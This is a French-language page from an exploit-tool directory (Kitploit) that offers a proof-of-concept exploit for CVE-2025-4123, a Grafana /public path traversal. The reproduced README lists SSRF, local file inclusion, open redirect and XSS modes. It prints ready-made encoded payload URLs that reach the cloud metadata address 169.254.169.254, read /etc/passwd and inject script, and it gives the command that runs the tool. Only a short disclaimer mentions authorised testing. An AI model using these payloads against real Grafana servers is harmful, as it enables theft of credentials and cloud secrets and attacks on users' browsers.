Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - Outil Grafana | Kitploit
Outils/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Outil Grafana

Voir le dépôt
326il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-4123 - Exploit de traversée de chemin Grafana

Développé par mitsec

Il s'agit d'un outil d'exploitation preuve de concept (PoC) pour CVE-2025-4123, une vulnérabilité critique de traversée de chemin dans le point de terminaison /public de Grafana. L'exploit permet de :

  • ✅ Contrefaçon de requête côté serveur (SSRF)
  • ✅ Inclusion de fichier local (LFI)
  • ✅ Redirection ouverte
  • ✅ Cross-Site Scripting (XSS)

🔥 Affecté

Instances Grafana dont le point de terminaison /public/ gère incorrectement les chemins encodés comme :

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 Utilisation

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

Sélectionnez ensuite le mode souhaité :

  1. SSRF - Services internes comme 169.254.169.254
  • LFI - Lire des fichiers comme /etc/passwd
  • Redirection ouverte - Rediriger vers des domaines externes
  • XSS - Injection JavaScript dans le chemin public

  • 🧪 Exemple

    root@kitploit:~
    [*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
    [*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
    [*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
    

    📄 Avertissement

    Ce code est fourni à des fins éducatives et de tests autorisés uniquement. Toute utilisation non autorisée contre des systèmes sans consentement est illégale.


    ✍️ Auteur

    • mitsec
    Télécharger l’outil